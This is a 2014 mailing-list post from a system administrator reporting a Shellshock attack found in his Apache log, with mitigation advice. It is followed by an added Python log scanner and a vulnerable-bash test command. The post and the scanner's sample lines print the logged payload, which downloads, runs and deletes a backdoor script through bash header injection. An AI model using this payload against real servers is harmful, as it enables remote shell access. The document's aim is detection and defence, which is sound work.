
First wave attack on Linux/Apache2

From: BillyBob Overalls
Subject: First wave attack on Linux/Apache2
Date: Thu, 25 Sep 2014 22:40:19 -0700 (PDT)
User-agent: G2/1.0

Entry from my Linux Apache2 access-log:
1038 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""

wow1 is a hacked stealth IRC perl script that will give the hacker shell 
access.  If that script is present in /var/tmp, chances are your hacker is 
still in your box.  If it is not, it does not mean you are safe.

This command (from the log entry above) downloads the script to your system:

wget -O /var/tmp/wow1

This one executes it:

perl /var/tmp/wow1

And when it exits, it is deleted.

rm -rf /var/tmp/wow1

THINGS YOU (or your administrator) CAN DO:

Find the user credentials your web server executes as in /etc/passwd and change 
the login shell to /bin/false -- or something that doesn't exist. Then restart 
apache.  If the web server can't invoke a shell, it can't set a variable or 
call /bin/bash to do the hacker's dirty work.

Be advised that this work-around will only patch the hole in your web server.  
Many other exploits are possible.  

Upgrade bash to 4.3.25 immediately, and hide all other shells.  At least one 
version each of sh and csh have been found to have the same vulnerability.  
Don't leave them where a hacker can expect to find them.

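As an added example (not part of the original post or its author's code), the following Python script automates the check the poster did by eye: it parses Apache combined-format access-log lines, looks for the `() {` function-definition prefix of the bash bug (CVE-2014-6271) in the request line, Referer and User-Agent, recovers the injected command with Apache's `\"` log escaping undone, and lists the /tmp and /var/tmp paths that command touches, so an administrator knows which files to look for on disk. The log lines are constructed for this example using documentation IP ranges; the first one mirrors the payload quoted in the post, including its URL-less wget exactly as logged.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i".
# Apache escapes embedded quotes in logged values as \", so the quoted fields
# accept backslash-escaped characters.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# CVE-2014-6271 trigger: an exported function definition "() { ...; }" with
# trailing commands that a vulnerable bash runs on import. Scanners vary the
# whitespace, so the pattern is lenient about spacing.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)$', re.S)

# Paths an injected command writes to or runs from; collected so the admin
# has a concrete list of files to check on disk afterwards.
TMP_PATH_RE = re.compile(r'/(?:var/)?tmp/[\w.\-]+')


@dataclass
class Finding:
    ip: str
    timestamp: str
    header: str                 # which logged field carried the payload
    command: str                # injected command(s), log escaping undone
    paths: List[str] = field(default_factory=list)


def extract_payload(value: str) -> Optional[str]:
    """Return the command injected after a Shellshock function body, or None."""
    m = SHELLSHOCK_RE.search(value)
    if not m:
        return None
    return m.group('cmd').replace('\\"', '"').strip()


def scan_line(line: str) -> List[Finding]:
    """Check one combined-format log line; one Finding per tainted field."""
    m = COMBINED_RE.match(line.rstrip('\n'))
    if not m:
        return []
    findings = []
    for header in ('request', 'referer', 'ua'):
        cmd = extract_payload(m.group(header))
        if cmd is not None:
            findings.append(Finding(
                ip=m.group('ip'),
                timestamp=m.group('ts'),
                header=header,
                command=cmd,
                paths=sorted(set(TMP_PATH_RE.findall(cmd))),
            ))
    return findings


def scan_log(lines) -> List[Finding]:
    return [f for line in lines for f in scan_line(line)]


# Constructed sample log lines (documentation IP ranges). The first mirrors the
# payload quoted in the post above; the second is a variant carried in the
# Referer header; the third is ordinary browser traffic and must not match.
SAMPLE_LOG = [
    r'192.0.2.10 - - [25/Sep/2014:22:31:07 -0700] "GET / HTTP/1.1" 200 1038 "-" '
    r'"() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""',
    r'198.51.100.7 - - [25/Sep/2014:22:33:41 -0700] "GET /cgi-bin/status HTTP/1.0" 404 291 '
    r'"() { :; }; /bin/bash -c \"id\"" "Mozilla/5.0"',
    r'203.0.113.5 - - [25/Sep/2014:22:35:02 -0700] "GET /index.html HTTP/1.1" 200 5120 '
    r'"http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
]

if __name__ == '__main__':
    # Typical use: python3 shellshock_scan.py < /var/log/apache2/access.log
    import sys
    source = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin
    for f in scan_log(source):
        print(f'{f.timestamp} {f.ip} via {f.header}: {f.command}')
        for p in f.paths:
            print(f'    check on disk: {p}')
```

Run against a real access log by piping it on stdin; with no input it scans the constructed samples. A hit in the log only tells you that someone tried; whether the attempt succeeded depends on the CGI or other code path that handed the header to bash. The usual local check for a still-vulnerable bash is `env x='() { :;}; echo vulnerable' bash -c 'echo test'`, which prints "vulnerable" on an unpatched build.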